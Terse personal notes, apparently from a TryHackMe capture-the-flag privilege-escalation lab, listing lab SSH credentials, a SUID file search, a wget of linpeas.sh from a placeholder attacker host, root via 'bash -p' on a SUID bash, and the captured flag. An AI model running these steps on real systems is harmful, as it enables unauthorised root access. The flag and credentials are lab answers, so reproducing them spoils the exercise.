privesc
ssh cmnatic@10.10.196.0
pass: aoc2020
permission -rwsr-:ls -al /usr/bin | grep "cp"
SUID files?:find / -perm -u=s -type f 2>/dev/null
//LinuxPriv Scripts
"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"
GTFObins
https://gtfobins.github.io

copy linpeas.sh
python -m http.server 8080
wget http://<attacker ip>:8080/linpeas.sh
chmod +x 777 linpeas.sh
./linpeas.sh
ssh cmnatic@10.10.196.0
find / -perm -u=s -type f 2>/dev/null
/bin/bash SUID file 
=>bash -p 
whoami => #root
cat /root/flag.txt
thm{2fb10afe933296592}
